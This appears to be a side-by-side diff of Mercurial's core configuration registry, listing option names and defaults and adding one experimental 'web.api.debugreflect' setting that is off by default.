461 coreconfigitem('experimental', 'directaccess',
462 default=False,
462 default=False,
463 )
463 )
464 coreconfigitem('experimental', 'directaccess.revnums',
464 coreconfigitem('experimental', 'directaccess.revnums',
465 default=False,
465 default=False,
466 )
466 )
467 coreconfigitem('experimental', 'editortmpinhg',
467 coreconfigitem('experimental', 'editortmpinhg',
468 default=False,
468 default=False,
469 )
469 )
470 coreconfigitem('experimental', 'evolution',
470 coreconfigitem('experimental', 'evolution',
471 default=list,
471 default=list,
472 )
472 )
473 coreconfigitem('experimental', 'evolution.allowdivergence',
473 coreconfigitem('experimental', 'evolution.allowdivergence',
474 default=False,
474 default=False,
475 alias=[('experimental', 'allowdivergence')]
475 alias=[('experimental', 'allowdivergence')]
476 )
476 )
477 coreconfigitem('experimental', 'evolution.allowunstable',
477 coreconfigitem('experimental', 'evolution.allowunstable',
478 default=None,
478 default=None,
479 )
479 )
480 coreconfigitem('experimental', 'evolution.createmarkers',
480 coreconfigitem('experimental', 'evolution.createmarkers',
481 default=None,
481 default=None,
482 )
482 )
483 coreconfigitem('experimental', 'evolution.effect-flags',
483 coreconfigitem('experimental', 'evolution.effect-flags',
484 default=True,
484 default=True,
485 alias=[('experimental', 'effect-flags')]
485 alias=[('experimental', 'effect-flags')]
486 )
486 )
487 coreconfigitem('experimental', 'evolution.exchange',
487 coreconfigitem('experimental', 'evolution.exchange',
488 default=None,
488 default=None,
489 )
489 )
490 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
490 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
491 default=False,
491 default=False,
492 )
492 )
493 coreconfigitem('experimental', 'evolution.report-instabilities',
493 coreconfigitem('experimental', 'evolution.report-instabilities',
494 default=True,
494 default=True,
495 )
495 )
496 coreconfigitem('experimental', 'evolution.track-operation',
496 coreconfigitem('experimental', 'evolution.track-operation',
497 default=True,
497 default=True,
498 )
498 )
499 coreconfigitem('experimental', 'worddiff',
499 coreconfigitem('experimental', 'worddiff',
500 default=False,
500 default=False,
501 )
501 )
502 coreconfigitem('experimental', 'maxdeltachainspan',
502 coreconfigitem('experimental', 'maxdeltachainspan',
503 default=-1,
503 default=-1,
504 )
504 )
505 coreconfigitem('experimental', 'mergetempdirprefix',
505 coreconfigitem('experimental', 'mergetempdirprefix',
506 default=None,
506 default=None,
507 )
507 )
508 coreconfigitem('experimental', 'mmapindexthreshold',
508 coreconfigitem('experimental', 'mmapindexthreshold',
509 default=None,
509 default=None,
510 )
510 )
511 coreconfigitem('experimental', 'nonnormalparanoidcheck',
511 coreconfigitem('experimental', 'nonnormalparanoidcheck',
512 default=False,
512 default=False,
513 )
513 )
514 coreconfigitem('experimental', 'exportableenviron',
514 coreconfigitem('experimental', 'exportableenviron',
515 default=list,
515 default=list,
516 )
516 )
517 coreconfigitem('experimental', 'extendedheader.index',
517 coreconfigitem('experimental', 'extendedheader.index',
518 default=None,
518 default=None,
519 )
519 )
520 coreconfigitem('experimental', 'extendedheader.similarity',
520 coreconfigitem('experimental', 'extendedheader.similarity',
521 default=False,
521 default=False,
522 )
522 )
523 coreconfigitem('experimental', 'format.compression',
523 coreconfigitem('experimental', 'format.compression',
524 default='zlib',
524 default='zlib',
525 )
525 )
526 coreconfigitem('experimental', 'graphshorten',
526 coreconfigitem('experimental', 'graphshorten',
527 default=False,
527 default=False,
528 )
528 )
529 coreconfigitem('experimental', 'graphstyle.parent',
529 coreconfigitem('experimental', 'graphstyle.parent',
530 default=dynamicdefault,
530 default=dynamicdefault,
531 )
531 )
532 coreconfigitem('experimental', 'graphstyle.missing',
532 coreconfigitem('experimental', 'graphstyle.missing',
533 default=dynamicdefault,
533 default=dynamicdefault,
534 )
534 )
535 coreconfigitem('experimental', 'graphstyle.grandparent',
535 coreconfigitem('experimental', 'graphstyle.grandparent',
536 default=dynamicdefault,
536 default=dynamicdefault,
537 )
537 )
538 coreconfigitem('experimental', 'hook-track-tags',
538 coreconfigitem('experimental', 'hook-track-tags',
539 default=False,
539 default=False,
540 )
540 )
541 coreconfigitem('experimental', 'httppostargs',
541 coreconfigitem('experimental', 'httppostargs',
542 default=False,
542 default=False,
543 )
543 )
544 coreconfigitem('experimental', 'mergedriver',
544 coreconfigitem('experimental', 'mergedriver',
545 default=None,
545 default=None,
546 )
546 )
547 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
547 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
548 default=False,
548 default=False,
549 )
549 )
550 coreconfigitem('experimental', 'remotenames',
550 coreconfigitem('experimental', 'remotenames',
551 default=False,
551 default=False,
552 )
552 )
553 coreconfigitem('experimental', 'revlogv2',
553 coreconfigitem('experimental', 'revlogv2',
554 default=None,
554 default=None,
555 )
555 )
556 coreconfigitem('experimental', 'single-head-per-branch',
556 coreconfigitem('experimental', 'single-head-per-branch',
557 default=False,
557 default=False,
558 )
558 )
559 coreconfigitem('experimental', 'sshserver.support-v2',
559 coreconfigitem('experimental', 'sshserver.support-v2',
560 default=False,
560 default=False,
561 )
561 )
562 coreconfigitem('experimental', 'spacemovesdown',
562 coreconfigitem('experimental', 'spacemovesdown',
563 default=False,
563 default=False,
564 )
564 )
565 coreconfigitem('experimental', 'sparse-read',
565 coreconfigitem('experimental', 'sparse-read',
566 default=False,
566 default=False,
567 )
567 )
568 coreconfigitem('experimental', 'sparse-read.density-threshold',
568 coreconfigitem('experimental', 'sparse-read.density-threshold',
569 default=0.25,
569 default=0.25,
570 )
570 )
571 coreconfigitem('experimental', 'sparse-read.min-gap-size',
571 coreconfigitem('experimental', 'sparse-read.min-gap-size',
572 default='256K',
572 default='256K',
573 )
573 )
574 coreconfigitem('experimental', 'treemanifest',
574 coreconfigitem('experimental', 'treemanifest',
575 default=False,
575 default=False,
576 )
576 )
577 coreconfigitem('experimental', 'update.atomic-file',
577 coreconfigitem('experimental', 'update.atomic-file',
578 default=False,
578 default=False,
579 )
579 )
580 coreconfigitem('experimental', 'sshpeer.advertise-v2',
580 coreconfigitem('experimental', 'sshpeer.advertise-v2',
581 default=False,
581 default=False,
582 )
582 )
583 coreconfigitem('experimental', 'web.apiserver',
583 coreconfigitem('experimental', 'web.apiserver',
584 default=False,
584 default=False,
585 )
585 )
586 coreconfigitem('experimental', 'web.api.http-v2',
586 coreconfigitem('experimental', 'web.api.http-v2',
587 default=False,
587 default=False,
588 )
588 )
589 coreconfigitem('experimental', 'web.api.debugreflect',
590 default=False,
591 )
589 coreconfigitem('experimental', 'xdiff',
592 coreconfigitem('experimental', 'xdiff',
590 default=False,
593 default=False,
591 )
594 )
592 coreconfigitem('extensions', '.*',
595 coreconfigitem('extensions', '.*',
593 default=None,
596 default=None,
594 generic=True,
597 generic=True,
595 )
598 )
596 coreconfigitem('extdata', '.*',
599 coreconfigitem('extdata', '.*',
597 default=None,
600 default=None,
598 generic=True,
601 generic=True,
599 )
602 )
600 coreconfigitem('format', 'aggressivemergedeltas',
603 coreconfigitem('format', 'aggressivemergedeltas',
601 default=False,
604 default=False,
602 )
605 )
603 coreconfigitem('format', 'chunkcachesize',
606 coreconfigitem('format', 'chunkcachesize',
604 default=None,
607 default=None,
605 )
608 )
606 coreconfigitem('format', 'dotencode',
609 coreconfigitem('format', 'dotencode',
607 default=True,
610 default=True,
608 )
611 )
609 coreconfigitem('format', 'generaldelta',
612 coreconfigitem('format', 'generaldelta',
610 default=False,
613 default=False,
611 )
614 )
612 coreconfigitem('format', 'manifestcachesize',
615 coreconfigitem('format', 'manifestcachesize',
613 default=None,
616 default=None,
614 )
617 )
615 coreconfigitem('format', 'maxchainlen',
618 coreconfigitem('format', 'maxchainlen',
616 default=None,
619 default=None,
617 )
620 )
618 coreconfigitem('format', 'obsstore-version',
621 coreconfigitem('format', 'obsstore-version',
619 default=None,
622 default=None,
620 )
623 )
621 coreconfigitem('format', 'usefncache',
624 coreconfigitem('format', 'usefncache',
622 default=True,
625 default=True,
623 )
626 )
624 coreconfigitem('format', 'usegeneraldelta',
627 coreconfigitem('format', 'usegeneraldelta',
625 default=True,
628 default=True,
626 )
629 )
627 coreconfigitem('format', 'usestore',
630 coreconfigitem('format', 'usestore',
628 default=True,
631 default=True,
629 )
632 )
630 coreconfigitem('fsmonitor', 'warn_when_unused',
633 coreconfigitem('fsmonitor', 'warn_when_unused',
631 default=True,
634 default=True,
632 )
635 )
633 coreconfigitem('fsmonitor', 'warn_update_file_count',
636 coreconfigitem('fsmonitor', 'warn_update_file_count',
634 default=50000,
637 default=50000,
635 )
638 )
636 coreconfigitem('hooks', '.*',
639 coreconfigitem('hooks', '.*',
637 default=dynamicdefault,
640 default=dynamicdefault,
638 generic=True,
641 generic=True,
639 )
642 )
640 coreconfigitem('hgweb-paths', '.*',
643 coreconfigitem('hgweb-paths', '.*',
641 default=list,
644 default=list,
642 generic=True,
645 generic=True,
643 )
646 )
644 coreconfigitem('hostfingerprints', '.*',
647 coreconfigitem('hostfingerprints', '.*',
645 default=list,
648 default=list,
646 generic=True,
649 generic=True,
647 )
650 )
648 coreconfigitem('hostsecurity', 'ciphers',
651 coreconfigitem('hostsecurity', 'ciphers',
649 default=None,
652 default=None,
650 )
653 )
651 coreconfigitem('hostsecurity', 'disabletls10warning',
654 coreconfigitem('hostsecurity', 'disabletls10warning',
652 default=False,
655 default=False,
653 )
656 )
654 coreconfigitem('hostsecurity', 'minimumprotocol',
657 coreconfigitem('hostsecurity', 'minimumprotocol',
655 default=dynamicdefault,
658 default=dynamicdefault,
656 )
659 )
657 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
660 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
658 default=dynamicdefault,
661 default=dynamicdefault,
659 generic=True,
662 generic=True,
660 )
663 )
661 coreconfigitem('hostsecurity', '.*:ciphers$',
664 coreconfigitem('hostsecurity', '.*:ciphers$',
662 default=dynamicdefault,
665 default=dynamicdefault,
663 generic=True,
666 generic=True,
664 )
667 )
665 coreconfigitem('hostsecurity', '.*:fingerprints$',
668 coreconfigitem('hostsecurity', '.*:fingerprints$',
666 default=list,
669 default=list,
667 generic=True,
670 generic=True,
668 )
671 )
669 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
672 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
670 default=None,
673 default=None,
671 generic=True,
674 generic=True,
672 )
675 )
673
676
674 coreconfigitem('http_proxy', 'always',
677 coreconfigitem('http_proxy', 'always',
675 default=False,
678 default=False,
676 )
679 )
677 coreconfigitem('http_proxy', 'host',
680 coreconfigitem('http_proxy', 'host',
678 default=None,
681 default=None,
679 )
682 )
680 coreconfigitem('http_proxy', 'no',
683 coreconfigitem('http_proxy', 'no',
681 default=list,
684 default=list,
682 )
685 )
683 coreconfigitem('http_proxy', 'passwd',
686 coreconfigitem('http_proxy', 'passwd',
684 default=None,
687 default=None,
685 )
688 )
686 coreconfigitem('http_proxy', 'user',
689 coreconfigitem('http_proxy', 'user',
687 default=None,
690 default=None,
688 )
691 )
689 coreconfigitem('logtoprocess', 'commandexception',
692 coreconfigitem('logtoprocess', 'commandexception',
690 default=None,
693 default=None,
691 )
694 )
692 coreconfigitem('logtoprocess', 'commandfinish',
695 coreconfigitem('logtoprocess', 'commandfinish',
693 default=None,
696 default=None,
694 )
697 )
695 coreconfigitem('logtoprocess', 'command',
698 coreconfigitem('logtoprocess', 'command',
696 default=None,
699 default=None,
697 )
700 )
698 coreconfigitem('logtoprocess', 'develwarn',
701 coreconfigitem('logtoprocess', 'develwarn',
699 default=None,
702 default=None,
700 )
703 )
701 coreconfigitem('logtoprocess', 'uiblocked',
704 coreconfigitem('logtoprocess', 'uiblocked',
702 default=None,
705 default=None,
703 )
706 )
704 coreconfigitem('merge', 'checkunknown',
707 coreconfigitem('merge', 'checkunknown',
705 default='abort',
708 default='abort',
706 )
709 )
707 coreconfigitem('merge', 'checkignored',
710 coreconfigitem('merge', 'checkignored',
708 default='abort',
711 default='abort',
709 )
712 )
710 coreconfigitem('experimental', 'merge.checkpathconflicts',
713 coreconfigitem('experimental', 'merge.checkpathconflicts',
711 default=False,
714 default=False,
712 )
715 )
713 coreconfigitem('merge', 'followcopies',
716 coreconfigitem('merge', 'followcopies',
714 default=True,
717 default=True,
715 )
718 )
716 coreconfigitem('merge', 'on-failure',
719 coreconfigitem('merge', 'on-failure',
717 default='continue',
720 default='continue',
718 )
721 )
719 coreconfigitem('merge', 'preferancestor',
722 coreconfigitem('merge', 'preferancestor',
720 default=lambda: ['*'],
723 default=lambda: ['*'],
721 )
724 )
722 coreconfigitem('merge-tools', '.*',
725 coreconfigitem('merge-tools', '.*',
723 default=None,
726 default=None,
724 generic=True,
727 generic=True,
725 )
728 )
726 coreconfigitem('merge-tools', br'.*\.args$',
729 coreconfigitem('merge-tools', br'.*\.args$',
727 default="$local $base $other",
730 default="$local $base $other",
728 generic=True,
731 generic=True,
729 priority=-1,
732 priority=-1,
730 )
733 )
731 coreconfigitem('merge-tools', br'.*\.binary$',
734 coreconfigitem('merge-tools', br'.*\.binary$',
732 default=False,
735 default=False,
733 generic=True,
736 generic=True,
734 priority=-1,
737 priority=-1,
735 )
738 )
736 coreconfigitem('merge-tools', br'.*\.check$',
739 coreconfigitem('merge-tools', br'.*\.check$',
737 default=list,
740 default=list,
738 generic=True,
741 generic=True,
739 priority=-1,
742 priority=-1,
740 )
743 )
741 coreconfigitem('merge-tools', br'.*\.checkchanged$',
744 coreconfigitem('merge-tools', br'.*\.checkchanged$',
742 default=False,
745 default=False,
743 generic=True,
746 generic=True,
744 priority=-1,
747 priority=-1,
745 )
748 )
746 coreconfigitem('merge-tools', br'.*\.executable$',
749 coreconfigitem('merge-tools', br'.*\.executable$',
747 default=dynamicdefault,
750 default=dynamicdefault,
748 generic=True,
751 generic=True,
749 priority=-1,
752 priority=-1,
750 )
753 )
751 coreconfigitem('merge-tools', br'.*\.fixeol$',
754 coreconfigitem('merge-tools', br'.*\.fixeol$',
752 default=False,
755 default=False,
753 generic=True,
756 generic=True,
754 priority=-1,
757 priority=-1,
755 )
758 )
756 coreconfigitem('merge-tools', br'.*\.gui$',
759 coreconfigitem('merge-tools', br'.*\.gui$',
757 default=False,
760 default=False,
758 generic=True,
761 generic=True,
759 priority=-1,
762 priority=-1,
760 )
763 )
761 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
764 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
762 default='basic',
765 default='basic',
763 generic=True,
766 generic=True,
764 priority=-1,
767 priority=-1,
765 )
768 )
766 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
769 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
767 default=dynamicdefault, # take from ui.mergemarkertemplate
770 default=dynamicdefault, # take from ui.mergemarkertemplate
768 generic=True,
771 generic=True,
769 priority=-1,
772 priority=-1,
770 )
773 )
771 coreconfigitem('merge-tools', br'.*\.priority$',
774 coreconfigitem('merge-tools', br'.*\.priority$',
772 default=0,
775 default=0,
773 generic=True,
776 generic=True,
774 priority=-1,
777 priority=-1,
775 )
778 )
776 coreconfigitem('merge-tools', br'.*\.premerge$',
779 coreconfigitem('merge-tools', br'.*\.premerge$',
777 default=dynamicdefault,
780 default=dynamicdefault,
778 generic=True,
781 generic=True,
779 priority=-1,
782 priority=-1,
780 )
783 )
781 coreconfigitem('merge-tools', br'.*\.symlink$',
784 coreconfigitem('merge-tools', br'.*\.symlink$',
782 default=False,
785 default=False,
783 generic=True,
786 generic=True,
784 priority=-1,
787 priority=-1,
785 )
788 )
786 coreconfigitem('pager', 'attend-.*',
789 coreconfigitem('pager', 'attend-.*',
787 default=dynamicdefault,
790 default=dynamicdefault,
788 generic=True,
791 generic=True,
789 )
792 )
790 coreconfigitem('pager', 'ignore',
793 coreconfigitem('pager', 'ignore',
791 default=list,
794 default=list,
792 )
795 )
793 coreconfigitem('pager', 'pager',
796 coreconfigitem('pager', 'pager',
794 default=dynamicdefault,
797 default=dynamicdefault,
795 )
798 )
796 coreconfigitem('patch', 'eol',
799 coreconfigitem('patch', 'eol',
797 default='strict',
800 default='strict',
798 )
801 )
799 coreconfigitem('patch', 'fuzz',
802 coreconfigitem('patch', 'fuzz',
800 default=2,
803 default=2,
801 )
804 )
802 coreconfigitem('paths', 'default',
805 coreconfigitem('paths', 'default',
803 default=None,
806 default=None,
804 )
807 )
805 coreconfigitem('paths', 'default-push',
808 coreconfigitem('paths', 'default-push',
806 default=None,
809 default=None,
807 )
810 )
808 coreconfigitem('paths', '.*',
811 coreconfigitem('paths', '.*',
809 default=None,
812 default=None,
810 generic=True,
813 generic=True,
811 )
814 )
812 coreconfigitem('phases', 'checksubrepos',
815 coreconfigitem('phases', 'checksubrepos',
813 default='follow',
816 default='follow',
814 )
817 )
815 coreconfigitem('phases', 'new-commit',
818 coreconfigitem('phases', 'new-commit',
816 default='draft',
819 default='draft',
817 )
820 )
818 coreconfigitem('phases', 'publish',
821 coreconfigitem('phases', 'publish',
819 default=True,
822 default=True,
820 )
823 )
821 coreconfigitem('profiling', 'enabled',
824 coreconfigitem('profiling', 'enabled',
822 default=False,
825 default=False,
823 )
826 )
824 coreconfigitem('profiling', 'format',
827 coreconfigitem('profiling', 'format',
825 default='text',
828 default='text',
826 )
829 )
827 coreconfigitem('profiling', 'freq',
830 coreconfigitem('profiling', 'freq',
828 default=1000,
831 default=1000,
829 )
832 )
830 coreconfigitem('profiling', 'limit',
833 coreconfigitem('profiling', 'limit',
831 default=30,
834 default=30,
832 )
835 )
833 coreconfigitem('profiling', 'nested',
836 coreconfigitem('profiling', 'nested',
834 default=0,
837 default=0,
835 )
838 )
836 coreconfigitem('profiling', 'output',
839 coreconfigitem('profiling', 'output',
837 default=None,
840 default=None,
838 )
841 )
839 coreconfigitem('profiling', 'showmax',
842 coreconfigitem('profiling', 'showmax',
840 default=0.999,
843 default=0.999,
841 )
844 )
842 coreconfigitem('profiling', 'showmin',
845 coreconfigitem('profiling', 'showmin',
843 default=dynamicdefault,
846 default=dynamicdefault,
844 )
847 )
845 coreconfigitem('profiling', 'sort',
848 coreconfigitem('profiling', 'sort',
846 default='inlinetime',
849 default='inlinetime',
847 )
850 )
848 coreconfigitem('profiling', 'statformat',
851 coreconfigitem('profiling', 'statformat',
849 default='hotpath',
852 default='hotpath',
850 )
853 )
851 coreconfigitem('profiling', 'type',
854 coreconfigitem('profiling', 'type',
852 default='stat',
855 default='stat',
853 )
856 )
854 coreconfigitem('progress', 'assume-tty',
857 coreconfigitem('progress', 'assume-tty',
855 default=False,
858 default=False,
856 )
859 )
857 coreconfigitem('progress', 'changedelay',
860 coreconfigitem('progress', 'changedelay',
858 default=1,
861 default=1,
859 )
862 )
860 coreconfigitem('progress', 'clear-complete',
863 coreconfigitem('progress', 'clear-complete',
861 default=True,
864 default=True,
862 )
865 )
863 coreconfigitem('progress', 'debug',
866 coreconfigitem('progress', 'debug',
864 default=False,
867 default=False,
865 )
868 )
866 coreconfigitem('progress', 'delay',
869 coreconfigitem('progress', 'delay',
867 default=3,
870 default=3,
868 )
871 )
869 coreconfigitem('progress', 'disable',
872 coreconfigitem('progress', 'disable',
870 default=False,
873 default=False,
871 )
874 )
872 coreconfigitem('progress', 'estimateinterval',
875 coreconfigitem('progress', 'estimateinterval',
873 default=60.0,
876 default=60.0,
874 )
877 )
875 coreconfigitem('progress', 'format',
878 coreconfigitem('progress', 'format',
876 default=lambda: ['topic', 'bar', 'number', 'estimate'],
879 default=lambda: ['topic', 'bar', 'number', 'estimate'],
877 )
880 )
878 coreconfigitem('progress', 'refresh',
881 coreconfigitem('progress', 'refresh',
879 default=0.1,
882 default=0.1,
880 )
883 )
881 coreconfigitem('progress', 'width',
884 coreconfigitem('progress', 'width',
882 default=dynamicdefault,
885 default=dynamicdefault,
883 )
886 )
884 coreconfigitem('push', 'pushvars.server',
887 coreconfigitem('push', 'pushvars.server',
885 default=False,
888 default=False,
886 )
889 )
887 coreconfigitem('server', 'bookmarks-pushkey-compat',
890 coreconfigitem('server', 'bookmarks-pushkey-compat',
888 default=True,
891 default=True,
889 )
892 )
890 coreconfigitem('server', 'bundle1',
893 coreconfigitem('server', 'bundle1',
891 default=True,
894 default=True,
892 )
895 )
893 coreconfigitem('server', 'bundle1gd',
896 coreconfigitem('server', 'bundle1gd',
894 default=None,
897 default=None,
895 )
898 )
896 coreconfigitem('server', 'bundle1.pull',
899 coreconfigitem('server', 'bundle1.pull',
897 default=None,
900 default=None,
898 )
901 )
899 coreconfigitem('server', 'bundle1gd.pull',
902 coreconfigitem('server', 'bundle1gd.pull',
900 default=None,
903 default=None,
901 )
904 )
902 coreconfigitem('server', 'bundle1.push',
905 coreconfigitem('server', 'bundle1.push',
903 default=None,
906 default=None,
904 )
907 )
905 coreconfigitem('server', 'bundle1gd.push',
908 coreconfigitem('server', 'bundle1gd.push',
906 default=None,
909 default=None,
907 )
910 )
908 coreconfigitem('server', 'compressionengines',
911 coreconfigitem('server', 'compressionengines',
909 default=list,
912 default=list,
910 )
913 )
911 coreconfigitem('server', 'concurrent-push-mode',
914 coreconfigitem('server', 'concurrent-push-mode',
912 default='strict',
915 default='strict',
913 )
916 )
914 coreconfigitem('server', 'disablefullbundle',
917 coreconfigitem('server', 'disablefullbundle',
915 default=False,
918 default=False,
916 )
919 )
917 coreconfigitem('server', 'maxhttpheaderlen',
920 coreconfigitem('server', 'maxhttpheaderlen',
918 default=1024,
921 default=1024,
919 )
922 )
920 coreconfigitem('server', 'preferuncompressed',
923 coreconfigitem('server', 'preferuncompressed',
921 default=False,
924 default=False,
922 )
925 )
923 coreconfigitem('server', 'uncompressed',
926 coreconfigitem('server', 'uncompressed',
924 default=True,
927 default=True,
925 )
928 )
926 coreconfigitem('server', 'uncompressedallowsecret',
929 coreconfigitem('server', 'uncompressedallowsecret',
927 default=False,
930 default=False,
928 )
931 )
929 coreconfigitem('server', 'validate',
932 coreconfigitem('server', 'validate',
930 default=False,
933 default=False,
931 )
934 )
932 coreconfigitem('server', 'zliblevel',
935 coreconfigitem('server', 'zliblevel',
933 default=-1,
936 default=-1,
934 )
937 )
935 coreconfigitem('share', 'pool',
938 coreconfigitem('share', 'pool',
936 default=None,
939 default=None,
937 )
940 )
938 coreconfigitem('share', 'poolnaming',
941 coreconfigitem('share', 'poolnaming',
939 default='identity',
942 default='identity',
940 )
943 )
941 coreconfigitem('smtp', 'host',
944 coreconfigitem('smtp', 'host',
942 default=None,
945 default=None,
943 )
946 )
944 coreconfigitem('smtp', 'local_hostname',
947 coreconfigitem('smtp', 'local_hostname',
945 default=None,
948 default=None,
946 )
949 )
947 coreconfigitem('smtp', 'password',
950 coreconfigitem('smtp', 'password',
948 default=None,
951 default=None,
949 )
952 )
950 coreconfigitem('smtp', 'port',
953 coreconfigitem('smtp', 'port',
951 default=dynamicdefault,
954 default=dynamicdefault,
952 )
955 )
953 coreconfigitem('smtp', 'tls',
956 coreconfigitem('smtp', 'tls',
954 default='none',
957 default='none',
955 )
958 )
956 coreconfigitem('smtp', 'username',
959 coreconfigitem('smtp', 'username',
957 default=None,
960 default=None,
958 )
961 )
959 coreconfigitem('sparse', 'missingwarning',
962 coreconfigitem('sparse', 'missingwarning',
960 default=True,
963 default=True,
961 )
964 )
962 coreconfigitem('subrepos', 'allowed',
965 coreconfigitem('subrepos', 'allowed',
963 default=dynamicdefault, # to make backporting simpler
966 default=dynamicdefault, # to make backporting simpler
964 )
967 )
965 coreconfigitem('subrepos', 'hg:allowed',
968 coreconfigitem('subrepos', 'hg:allowed',
966 default=dynamicdefault,
969 default=dynamicdefault,
967 )
970 )
968 coreconfigitem('subrepos', 'git:allowed',
971 coreconfigitem('subrepos', 'git:allowed',
969 default=dynamicdefault,
972 default=dynamicdefault,
970 )
973 )
971 coreconfigitem('subrepos', 'svn:allowed',
974 coreconfigitem('subrepos', 'svn:allowed',
972 default=dynamicdefault,
975 default=dynamicdefault,
973 )
976 )
974 coreconfigitem('templates', '.*',
977 coreconfigitem('templates', '.*',
975 default=None,
978 default=None,
976 generic=True,
979 generic=True,
977 )
980 )
978 coreconfigitem('trusted', 'groups',
981 coreconfigitem('trusted', 'groups',
979 default=list,
982 default=list,
980 )
983 )
981 coreconfigitem('trusted', 'users',
984 coreconfigitem('trusted', 'users',
982 default=list,
985 default=list,
983 )
986 )
984 coreconfigitem('ui', '_usedassubrepo',
987 coreconfigitem('ui', '_usedassubrepo',
985 default=False,
988 default=False,
986 )
989 )
987 coreconfigitem('ui', 'allowemptycommit',
990 coreconfigitem('ui', 'allowemptycommit',
988 default=False,
991 default=False,
989 )
992 )
990 coreconfigitem('ui', 'archivemeta',
993 coreconfigitem('ui', 'archivemeta',
991 default=True,
994 default=True,
992 )
995 )
993 coreconfigitem('ui', 'askusername',
996 coreconfigitem('ui', 'askusername',
994 default=False,
997 default=False,
995 )
998 )
996 coreconfigitem('ui', 'clonebundlefallback',
999 coreconfigitem('ui', 'clonebundlefallback',
997 default=False,
1000 default=False,
998 )
1001 )
999 coreconfigitem('ui', 'clonebundleprefers',
1002 coreconfigitem('ui', 'clonebundleprefers',
1000 default=list,
1003 default=list,
1001 )
1004 )
1002 coreconfigitem('ui', 'clonebundles',
1005 coreconfigitem('ui', 'clonebundles',
1003 default=True,
1006 default=True,
1004 )
1007 )
1005 coreconfigitem('ui', 'color',
1008 coreconfigitem('ui', 'color',
1006 default='auto',
1009 default='auto',
1007 )
1010 )
1008 coreconfigitem('ui', 'commitsubrepos',
1011 coreconfigitem('ui', 'commitsubrepos',
1009 default=False,
1012 default=False,
1010 )
1013 )
1011 coreconfigitem('ui', 'debug',
1014 coreconfigitem('ui', 'debug',
1012 default=False,
1015 default=False,
1013 )
1016 )
1014 coreconfigitem('ui', 'debugger',
1017 coreconfigitem('ui', 'debugger',
1015 default=None,
1018 default=None,
1016 )
1019 )
1017 coreconfigitem('ui', 'editor',
1020 coreconfigitem('ui', 'editor',
1018 default=dynamicdefault,
1021 default=dynamicdefault,
1019 )
1022 )
1020 coreconfigitem('ui', 'fallbackencoding',
1023 coreconfigitem('ui', 'fallbackencoding',
1021 default=None,
1024 default=None,
1022 )
1025 )
1023 coreconfigitem('ui', 'forcecwd',
1026 coreconfigitem('ui', 'forcecwd',
1024 default=None,
1027 default=None,
1025 )
1028 )
1026 coreconfigitem('ui', 'forcemerge',
1029 coreconfigitem('ui', 'forcemerge',
1027 default=None,
1030 default=None,
1028 )
1031 )
1029 coreconfigitem('ui', 'formatdebug',
1032 coreconfigitem('ui', 'formatdebug',
1030 default=False,
1033 default=False,
1031 )
1034 )
1032 coreconfigitem('ui', 'formatjson',
1035 coreconfigitem('ui', 'formatjson',
1033 default=False,
1036 default=False,
1034 )
1037 )
1035 coreconfigitem('ui', 'formatted',
1038 coreconfigitem('ui', 'formatted',
1036 default=None,
1039 default=None,
1037 )
1040 )
1038 coreconfigitem('ui', 'graphnodetemplate',
1041 coreconfigitem('ui', 'graphnodetemplate',
1039 default=None,
1042 default=None,
1040 )
1043 )
1041 coreconfigitem('ui', 'interactive',
1044 coreconfigitem('ui', 'interactive',
1042 default=None,
1045 default=None,
1043 )
1046 )
1044 coreconfigitem('ui', 'interface',
1047 coreconfigitem('ui', 'interface',
1045 default=None,
1048 default=None,
1046 )
1049 )
1047 coreconfigitem('ui', 'interface.chunkselector',
1050 coreconfigitem('ui', 'interface.chunkselector',
1048 default=None,
1051 default=None,
1049 )
1052 )
1050 coreconfigitem('ui', 'logblockedtimes',
1053 coreconfigitem('ui', 'logblockedtimes',
1051 default=False,
1054 default=False,
1052 )
1055 )
1053 coreconfigitem('ui', 'logtemplate',
1056 coreconfigitem('ui', 'logtemplate',
1054 default=None,
1057 default=None,
1055 )
1058 )
1056 coreconfigitem('ui', 'merge',
1059 coreconfigitem('ui', 'merge',
1057 default=None,
1060 default=None,
1058 )
1061 )
1059 coreconfigitem('ui', 'mergemarkers',
1062 coreconfigitem('ui', 'mergemarkers',
1060 default='basic',
1063 default='basic',
1061 )
1064 )
1062 coreconfigitem('ui', 'mergemarkertemplate',
1065 coreconfigitem('ui', 'mergemarkertemplate',
1063 default=('{node|short} '
1066 default=('{node|short} '
1064 '{ifeq(tags, "tip", "", '
1067 '{ifeq(tags, "tip", "", '
1065 'ifeq(tags, "", "", "{tags} "))}'
1068 'ifeq(tags, "", "", "{tags} "))}'
1066 '{if(bookmarks, "{bookmarks} ")}'
1069 '{if(bookmarks, "{bookmarks} ")}'
1067 '{ifeq(branch, "default", "", "{branch} ")}'
1070 '{ifeq(branch, "default", "", "{branch} ")}'
1068 '- {author|user}: {desc|firstline}')
1071 '- {author|user}: {desc|firstline}')
1069 )
1072 )
1070 coreconfigitem('ui', 'nontty',
1073 coreconfigitem('ui', 'nontty',
1071 default=False,
1074 default=False,
1072 )
1075 )
1073 coreconfigitem('ui', 'origbackuppath',
1076 coreconfigitem('ui', 'origbackuppath',
1074 default=None,
1077 default=None,
1075 )
1078 )
1076 coreconfigitem('ui', 'paginate',
1079 coreconfigitem('ui', 'paginate',
1077 default=True,
1080 default=True,
1078 )
1081 )
1079 coreconfigitem('ui', 'patch',
1082 coreconfigitem('ui', 'patch',
1080 default=None,
1083 default=None,
1081 )
1084 )
1082 coreconfigitem('ui', 'portablefilenames',
1085 coreconfigitem('ui', 'portablefilenames',
1083 default='warn',
1086 default='warn',
1084 )
1087 )
1085 coreconfigitem('ui', 'promptecho',
1088 coreconfigitem('ui', 'promptecho',
1086 default=False,
1089 default=False,
1087 )
1090 )
1088 coreconfigitem('ui', 'quiet',
1091 coreconfigitem('ui', 'quiet',
1089 default=False,
1092 default=False,
1090 )
1093 )
1091 coreconfigitem('ui', 'quietbookmarkmove',
1094 coreconfigitem('ui', 'quietbookmarkmove',
1092 default=False,
1095 default=False,
1093 )
1096 )
